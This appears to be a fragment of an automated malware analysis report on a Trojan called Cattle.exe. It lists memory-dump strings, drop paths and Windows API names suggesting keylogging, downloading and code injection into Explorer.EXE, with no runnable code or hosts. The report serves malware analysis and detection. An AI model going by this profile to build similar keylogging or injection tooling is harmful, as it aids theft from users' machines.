Date: Wed, 11 Nov 2015 11:15:33 GMT
Content-Type: text/plain
Content-Length: 981316
Last-Modified: Fri, 06 Nov 2015 14:21:22 GMT
Connection: close
ETag: "563cb762-ef944"
Accept-Ranges: bytes
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
Cattle.exe_3444:
Cattle.exe_3444_rwx_00401000_001FB000:
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
c:\windows\temp\Cattle.exe
06/02/2011
000000000000
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_1234
PeekNamedPipe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
Reporte_Dispatch
RegQueryInfoKeyA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
GetAsyncKeyState
MapVirtualKeyA
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetKeyNameTextA
UnhookWindowsHookEx
MapVirtualKeyExA
GetKeyboardLayout
GetKeyboardState
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetOpenUrlA
.text
`.rdata
@.data
.rsrc
@.reloc
@WININET.DLL
accKeyboardShortcut
hhctrl.ocx
KERNEL32.DLL
dwmapi.dll
UxTheme.dll
USER32.DLL
NRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
manufacturer:%s
product name:%s
version:%s
serial number:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
sku number:%s
family:%s
Cattle.exe_3444_rwx_10018000_0002F000:
Explorer.EXE_1572_rwx_00EF0000_00005000:
%WinDir%\HpE\wow64\rebuild.exe
%Program Files%\tango3\tango3.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW
Explorer.EXE_1572_rwx_00FF0000_00004000:
%System%\LQdhJ\yYJSx.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW